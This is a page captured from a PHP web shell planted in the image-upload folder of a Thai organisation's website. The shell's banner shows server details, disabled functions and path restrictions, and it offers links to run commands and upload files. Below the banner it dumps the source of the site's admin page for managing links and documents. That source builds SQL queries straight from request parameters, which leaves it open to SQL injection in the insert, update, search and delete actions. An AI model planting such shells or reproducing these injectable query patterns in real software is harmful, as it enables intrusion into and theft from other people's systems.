|
Server IP : 124.109.2.77 / Your IP : 216.73.216.49 Web Server : Apache/2 System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : cpctlp ( 1020) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341 OFF Directory (0755) : /home/cpctlp/domains/cpctlphp.com/public_html/admin/js/../images/../src/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
session_start();
header('Content-Type: text/plain; charset=utf-8');
header('Content-Type: text/html; charset=utf-8');
//กำหนดให้ IE อ่าน page นี้ทุกครั้ง ไม่ไปเอาจาก cache
header ("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header ("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header ("Cache-Control: no-cache, must-revalidate");
header ("Pragma: no-cache");
include ("Connections/config.php");
if($_SESSION[UserRight]!="A"){
echo "<BR><BR><META HTTP-EQUIV=\"REFRESH\" CONTENT=\"1; URL=index.php\">";
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- Meta, title, CSS, favicons, etc. -->
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title><?php echo $config[web_title];?></title>
<?php include("header-css.php");?>
<!-- Ckeditor -->
<script src="ckeditor4.10.1/ckeditor.js"></script>
<!-- Ckeditor -->
</head>
<?php
include ("Connections/function-sys.php");
$page_data=25;
$sql="select page_name.* from page_name where page_data='$page_data' ";
$arr=$db->getRec($sql);
$page_name=$arr[page_name];
$page_data="$arr[page_data]";
?>
<body class="nav-md">
<div class="container body">
<div class="main_container">
<!-- Left side column. contains the logo and sidebar -->
<?php include("left-menu.php");?>
<!-- Left side column. contains the logo and sidebar -->
<!-- Header -->
<?php include("header.php");?>
<!-- Header -->
<!-- page content -->
<div class="right_col" role="main">
<div class="">
<!-- Start -->
<div class="clearfix"></div><!-- เส้น -->
<div class="row">
<div class="col-md-12 col-sm-12 col-xs-12">
<div class="x_panel">
<div class="x_title">
<h2> <?php echo $page_name;?> </h2>
<div class="clearfix"></div>
</div>
<div class="x_content">
<!-- เริ่มต้น -->
<?php
switch($_REQUEST[action]){
case "Insert2DB":
$sql ="select * from link where name='$_REQUEST[name]' and page_data='$page_data' and budgetYear='$_REQUEST[budgetYear]' ";
$row=$db->recCount($sql);
if($row!=0){
$msg="ข้อมูลนี้มีแล้ว!";
}else
{
if(!empty($_FILES[Img1][name])){
$qExt="jpg,png,gif,pjpeg,jpeg,jfif";
$size=800;
$filename=date("YmdHis");
$Img11=upload_resizeIMG("Img1","images/link",$filename,$qExt,$size);//ถ้ากำหนด size เป็น 0 หรือช่องว่าง จะไม่ resize resize เฉพาะรูปภาพ
}else
{
$Img11="logo.png";
}
if(!empty($_FILES[qFile][name])){
$qExt="jpg,png,gif,pjpeg,ppt,pptx,pdf,doc,docx,xls,xlsx";
$size=0;
$filename=date("YmdHis")."1";
$filename=upload_resizeIMG("qFile","images/link",$filename,$qExt,$size);//ถ้ากำหนด size เป็น 0 หรือช่องว่าง จะไม่ resize resize เฉพาะรูปภาพ
}
if(!empty($_REQUEST[qurl])){
$qurl=$_REQUEST[qurl];
}
$today=ShowAllDate($_REQUEST[linkDate],5);
$aTime=explode(".",$_REQUEST[aTime]);
$aTime[0]=sprintf("%02d",$aTime[0]);
$aTime[1]=sprintf("%02d",$aTime[1]);
$today=$today." ".$aTime[0].":".$aTime[1];
$uniqid = $rand = substr(str_shuffle('ABCDEFGHIJKLMNOPQRSTUVWXYZ23456789'),0,5);//str_shuffle สับเปลี่ยนตัวอักษรในสตริง ด้วยฟังก์ชัน str_shuffle()
$sql="insert into link (budgetYear,name,title,url,qFile,page_data,uniqid,empID,lastupdate,linkDate,aImg) values
('$_REQUEST[budgetYear]','$_REQUEST[name]','$_REQUEST[title]','$qurl','$filename','$page_data','$uniqid','$_SESSION[User_id]',now(),'$today','$Img11')";
$db->query($sql);
$msg="บันทึกข้อมูลเรียบร้อยแล้ว!";
}
echo <<<DOC
<CENTER><IMG SRC="images/icons/loading2.gif" WIDTH="100" BORDER="0" ></CENTER>
<script>
SweetAlert('$msg','$_SERVER[PHP_SELF]')
</script>
DOC;
break;
default :
if(empty($_REQUEST[page])){
$page=1;
}else
{
$page=$_REQUEST[page];
}
if(!empty($_REQUEST[TxTSeach])){
$Where=" $Where and (link.name like '%$_REQUEST[TxTSeach]%' or link.budgetYear like '%$_REQUEST[TxTSeach]%' ) ";
}
if(!empty($_REQUEST[budgetYear])){
$Where=" $Where and link.budgetYear='$_REQUEST[budgetYear]' ";
$budgetYear=$_REQUEST[budgetYear];
}else
{
$sql ="select distinct budgetYear from link where page_data='$page_data' Order By budgetYear desc";
$arr=$db->getRec($sql);
$budgetYear=$arr[budgetYear];
$Where=" $Where and link.budgetYear='$arr[budgetYear]' ";
}
echo <<<DOC
<CENTER>
<div style="width:99%">
<form method="post" id="s" action="$_SERVER[PHP_SELF]">
<TABLE style="width:99%">
<TR>
<TD width="15%"><A HREF="$_SERVER[PHP_SELF]?action=AddForm">
<button type="button" class="btn btn-success btn-sm pull-left"><span class="glyphicon glyphicon-plus-sign"></span> <strong>เพิ่มข้อมูล</strong></button></A></TD>
<TD width="20%" align="right"><input type="text" class="form-control" name="TxTSeach" placeholder="หัวเรื่อง" value="" style="width:80%;"></TD>
<TD width="1%"> </TD>
<!-- <TD width="5%" align="right">
<select name="budgetYear" class="form-control" id="budgetYear">
<option value=""></option>
DOC;
$sql ="select distinct budgetYear from link where page_data='$page_data' Order By budgetYear desc";
foreach ($db->dbSearch($sql) as $i=>$arr2) {
if($arr2[budgetYear]==$budgetYear ){$se=" selected"; }else{$se="";}
echo "<option value=\"$arr2[budgetYear]\" $se>$arr2[budgetYear] </option>";
}
echo <<<DOC
</select>
</TD> -->
<TD width="1%"> </TD>
<TD width="3%"><button type="submit" class="btn btn-success btn-sm"><i class="glyphicon glyphicon-search"></i></button></TD>
</TR>
</TABLE>
</form>
<div class="col-sm-12">
</div><BR><BR>
<table class="table table-hover" >
<thead>
<tr class="warning" style="text-align: center">
<th width=5% style="text-align: center">ลำดับ</th>
<th style="text-align: left">รายการ</th>
<!-- <th style="text-align: center" class="col-lg-1">ปีงบประมาณ</th> -->
<th width=5% style="text-align: center">แก้ไข</th>
<th width=5% style="text-align: center">ลบ</th>
</tr>
</thead>
<tbody id="myTable">
DOC;
$sql ="select * from link where page_data='$page_data' $Where order by budgetYear desc,linkID desc ";
$row=$db->recCount($sql);
if($row!=0){
foreach ($db->dbSearch($sql) as $i=>$arr) {
$j=1+$i;
if(!empty($arr[qFile])){
$arr[url]="../ShowLink.php?id=$arr[uniqid]$arr[linkID]";
}
$arr[linkDate]=ShowAllDate($arr[linkDate],4)." ".substr($arr[linkDate],10,10);
echo <<<DOC
<tr>
<td style="text-align: center" width=5%>$j</td>
<td><A HREF="$arr[url]" target="link">$arr[name]</A> <BR><span class="pull-left"style="color:#999999;font-size: 10px;">เผยแพร่:$arr[linkDate]</span></td>
<!-- <td>$arr[budgetYear]</td> -->
<td style="text-align: center" width=1%><A HREF="$_SERVER[PHP_SELF]?action=AddForm&linkID=$arr[linkID]">
<button type="button" class="btn btn-success btn-xs" style="width:25px;height: 25px;"><span class="glyphicon glyphicon-pencil"></span></button></A></td>
<td style="text-align: center" width=1%>
<A HREF="#" onClick="sebSweetConfirm('$_SERVER[PHP_SELF]?action=del4Data&linkID=$arr[linkID]');">
<button type="button" class="btn btn-danger btn-xs" style="width:25px;height: 25px;"><span class="glyphicon glyphicon-trash"></span></button></A>
</td>
</tr>
DOC;
}
}else
{
echo <<<DOC
<tr>
<td colspan=13><BR><div align=center><strong>ไม่พบข้อมูล!</strong></div><BR></td>
</tr>
DOC;
}
echo "</tbody>
</table>
</div>
</CENTER>";
break;
case "del4Data":
$sql="delete from link where linkID='$_REQUEST[linkID]' ";
$db->query($sql);
echo <<<DOC
<CENTER><IMG SRC="images/icons/loading2.gif" WIDTH="100" BORDER="0" ></CENTER>
<script>
SweetAlert('$msg','$_SERVER[PHP_SELF]')
</script>
DOC;
break;
case "Update2DB":
$sql ="select * from link where name='$_REQUEST[name]' and linkID !='$_REQUEST[linkID]' and page_data='$page_data' and budgetYear='$_REQUEST[budgetYear]' ";
$row=$db->recCount($sql);
if($row!=0){
$msg="ข้อมูลนี้มีแล้ว!";
}else
{
if(!empty($_FILES[Img1][name])){
$qExt="jpg,png,gif,pjpeg,jpeg,jfif";
$size=800;
$filename=date("YmdHis");
$Img11=upload_resizeIMG("Img1","images/link",$filename,$qExt,$size);//ถ้ากำหนด size เป็น 0 หรือช่องว่าง จะไม่ resize resize เฉพาะรูปภาพ
}else
{
$Img11= $_REQUEST[aImg2];
}
if(!empty($_FILES[qFile][name])){
$qExt="jpg,png,gif,pjpeg,ppt,pptx,pdf,doc,docx,xls,xlsx";
$size=0;
$filename=date("YmdHis")."1";
$filename=upload_resizeIMG("qFile","images/link",$filename,$qExt,$size);//ถ้ากำหนด size เป็น 0 หรือช่องว่าง จะไม่ resize resize เฉพาะรูปภาพ
}else
{
$filename=$_REQUEST[qFile2];
}
if(!empty($_REQUEST[qurl])){
$qurl=$_REQUEST[qurl];
}
$today=ShowAllDate($_REQUEST[linkDate],5);
$aTime=explode(".",$_REQUEST[aTime]);
$aTime[0]=sprintf("%02d",$aTime[0]);
$aTime[1]=sprintf("%02d",$aTime[1]);
$today=$today." ".$aTime[0].":".$aTime[1];
$sql="update link set budgetYear='$_REQUEST[budgetYear]',name='$_REQUEST[name]',title='$_REQUEST[title]',url='$qurl',qFile='$filename',aImg='$Img11'
,linkDate='$today',empID='$_SESSION[User_id]',lastupdate=now()
where linkID='$_REQUEST[linkID]'";
$db->query($sql);
$msg="บันทึกข้อมูลเรียบร้อยแล้ว!";
}
echo <<<DOC
<CENTER><IMG SRC="images/icons/loading2.gif" WIDTH="100" BORDER="0" ></CENTER>
<script>
SweetAlert('$msg','$_SERVER[PHP_SELF]')
</script>
DOC;
break;
case "del4Img":
$sql="update link set aImg='' where linkID='$_REQUEST[linkID]' ";
$db->query($sql);
echo <<<DOC
<CENTER><IMG SRC="images/icons/loading2.gif" WIDTH="100" BORDER="0" ></CENTER>
<script>
SweetAlert('ลบข้อมูลเรียบร้อยแล้ว','$_SERVER[PHP_SELF]')
</script>
DOC;
break;
case "AddForm":
if(empty($_REQUEST[linkID])){
$action="Insert2DB";
$arrE[linkDate]=ShowAllDate(date("Y-m-d"),4);
$arrE[aTime]=date("H.i");
if(date("m")>9){
$arrE[budgetYear]=date("Y")+544;
}else
{
$arrE[budgetYear]=date("Y")+543;
}
}else
{
$action="Update2DB";
$sql="select link.* from link where linkID='$_REQUEST[linkID]' ";
$arrE=$db->getRec($sql);
$arrE[aTime]=str_replace(":",".",substr($arrE[linkDate],10,6));
$arrE[linkDate]=ShowAllDate($arrE[linkDate],4);
if(!empty($arrE[aImg])){
$aImg="<A HREF=\"images/link/$arrE[aImg]\" target=doc><IMG SRC=\"images/link/$arrE[aImg]\" BORDER=0 class=\"img-rounded\" style=\"width:40%\"></A>";
$aImgDel="<A HREF=\"#\" onClick=\"sebSweetConfirm2('คุณต้องการรูปประกอบ','$_SERVER[PHP_SELF]?action=del4Img&linkID=$arrE[linkID]');\">
<button type=\"button\" class=\"btn btn-danger btn-xs\" style=\"width:25px;\"><span class=\"glyphicon glyphicon-trash\"></span></button></A>";
}
}
?>
<form id="linkForm" method="post" action="<?php echo $_SERVER[PHP_SELF];?>" class="form-horizontal" enctype="multipart/form-data" >
<div class="col-lg-12">
<!-- <div class="form-group">
<label class="col-lg-2 control-label">ปีงบประมาณ</label>
<div class="col-lg-2">
<input type="text" class="form-control" name="budgetYear" placeholder="ปีงบประมาณ" value="<?php echo $arrE[budgetYear];?>" required/>
</div>
</div> -->
<div class="form-group">
<label class="col-lg-2 control-label">หัวเรื่อง</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="name" placeholder="หัวเรื่อง,รายละเอียด" value="<?php echo $arrE[name];?>" required/>
</div>
</div>
<div class="form-group">
<label class="col-lg-2 control-label">คำอธิบาย</label>
<div class="col-lg-10">
<textarea id="title" class="ckeditor" name="title" rows="7" cols="100"><?php echo $arrE[title];?></textarea>
</div>
</div>
<div class="form-group">
<label class="col-lg-2 control-label">รูปปก</label>
<div class="col-lg-8">
<a class='btn btn-primary' href='javascript:;'>เลือกไฟล์
<input type="file" style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="Img1" size="40" onchange='$("#upload-file-info").html($(this).val());'>
</a>
<span class='label label-info' id="upload-file-info"></span><BR>
<input type="hidden" name="aImg2" value="<?php echo $arrE[aImg];?>" /><?php echo "$aImg $aImgDel";?>
</div>
</div>
<div class="form-group">
<label class="col-lg-2 control-label">ลิงค์</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="qurl" placeholder="เว็บลิงค์" value="<?php echo $arrE[url];?>" autocomplete="off" />
</div>
</div>
<div class="form-group">
<label class="col-lg-2 control-label">ไฟล์เอกสาร</label>
<div class="col-lg-8">
<a class='btn btn-primary' href='javascript:;'>เลือกไฟล์
<input type="file" style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="qFile" size="40" onchange='$("#upload-file-info2").html($(this).val());'>
</a>
<span class='label label-info' id="upload-file-info2"></span>
</div>
</div>
<div class="form-group">
<label class="col-lg-2 control-label">วันที่</label>
<div class="col-lg-4">
<span class="col-lg-4" style="padding-left:1px;padding-right:1px;">
<input type="text" class="form-control pull-right" id="linkDate" name="linkDate" placeholder="วันที่" value="<?php echo $arrE[linkDate];?>" readonly data-provide="datepicker" data-date-language="th-th" >
</span>
<label class="col-lg-2 control-label" style="text-align:right;">เวลา</label>
<span class="col-lg-3" style="padding-left:1px;padding-right:1px;">
<input name="aTime" type="text" class="form-control input" id="aTime" value="<?php echo $arrE[aTime];?>" placeholder="เวลา" />
</span>
<label class="col-lg-3 control-label" style="text-align:left;">Ex. 8.30</label>
</div>
</div>
<div class="form-group">
<div class="col-lg-11 col-lg-offset-2">
<button type="submit" class="btn btn-primary">บันทึก</button>
<button type="button" class="btn btn-primary" onclick="self.location.href='<?php echo "$_SERVER[PHP_SELF]";?>' ">ยกเลิก</button>
<INPUT TYPE="hidden" NAME="action" value="<?php echo $action;?>">
<INPUT TYPE="hidden" NAME="linkID" value="<?php echo $_REQUEST[linkID];?>">
<INPUT TYPE="hidden" NAME="qFile2" value="<?php echo $arrE[qFile];?>">
</div>
</div>
</div>
<!-- <div class="col-lg-10">-->
</form>
<?php
break;
}//ปิด switch?>
<!-- สิ้นสุด -->
</div><!-- x_content -->
</div><!-- x_panel -->
</div>
</div>
<!-- Stop -->
</div>
</div>
<!-- /page content -->
<!-- Footer -->
<?php include("footer.php");?>
<!-- Footer -->
</div>
</div>
<?php include("header-script.php");?>
<script>
function format2(input)
{
var num = input.value.replace(/\,/g,'');
if(!isNaN(num))
{
if(num.indexOf('.') > -1)
{
num = num.split('.');
num[0] = num[0].toString().split('').reverse().join('').replace(/(?=\d*\.?)(\d{3})/g,'$1,').split('').reverse().join('').replace(/^[\,]/,'');
if(num[1].length > 2)
{
alert('กรุณาป้อนทศนิยมไม่เกินสองตำแหน่ง');
num[1] = num[1].substring(0,num[1].length-1);
}
input.value = num[0]+'.'+num[1];
}
else
{
input.value = num.toString().split('').reverse().join('').replace(/(?=\d*\.?)(\d{3})/g,'$1,').split('').reverse().join('').replace(/^[\,]/,'') ;
};
}
else
{
alert('กรุณากรอกตัวเลขในช่องนี้');
input.value = input.value.substring(0,input.value.length-1);
}
}
function addCommas(nStr){
nStr = parseFloat(nStr);
nStr=nStr.toFixed(2);
nStr += '';
x = nStr.split('.');
x1 = x[0];
x2 = x.length > 1 ? '.' + x[1] : '';
var rgx = /(\d+)(\d{3})/;
while (rgx.test(x1)) {
x1 = x1.replace(rgx, '$1' + ',' + '$2');
}
return x1 + x2;
}
</script>
<!-- bootstrap-daterangepicker -->
<script src="js/bootstrap-datepicker.js"></script>
<script src="js/bootstrap-datepicker-thai.js"></script>
<script src="js/locales/bootstrap-datepicker.th.js"></script>
<script id="example_script" type="text/javascript">
function demo() {
$('.datepicker').datepicker();
}
$('#linkDate').datepicker({
format: "dd/mm/yyyy",
autoclose: true
});
$('#StartDate').datepicker({
format: "dd/mm/yyyy",
autoclose: true
});
$('#StopDate').datepicker({
format: "dd/mm/yyyy",
autoclose: true
});
</script>
<script type="text/javascript">
$(function(){
$('pre[data-source]').each(function(){
var $this = $(this),
$source = $($this.data('source'));
var text = [];
$source.each(function(){
var $s = $(this);
if ($s.attr('type') == 'text/javascript'){
text.push($s.html().replace(/(\n)*/, ''));
} else {
text.push($s.clone().wrap('<div>').parent().html()
.replace(/(\"(?=[[{]))/g,'\'')
.replace(/\]\"/g,']\'').replace(/\}\"/g,'\'') // javascript not support lookbehind
.replace(/\"\;/g,'"'));
}
});
$this.text(text.join('\n\n').replace(/\t/g, ' '));
});
prettyPrint();
demo();
});
</script>
<!-- bootstrap-daterangepicker -->
</body>
</html>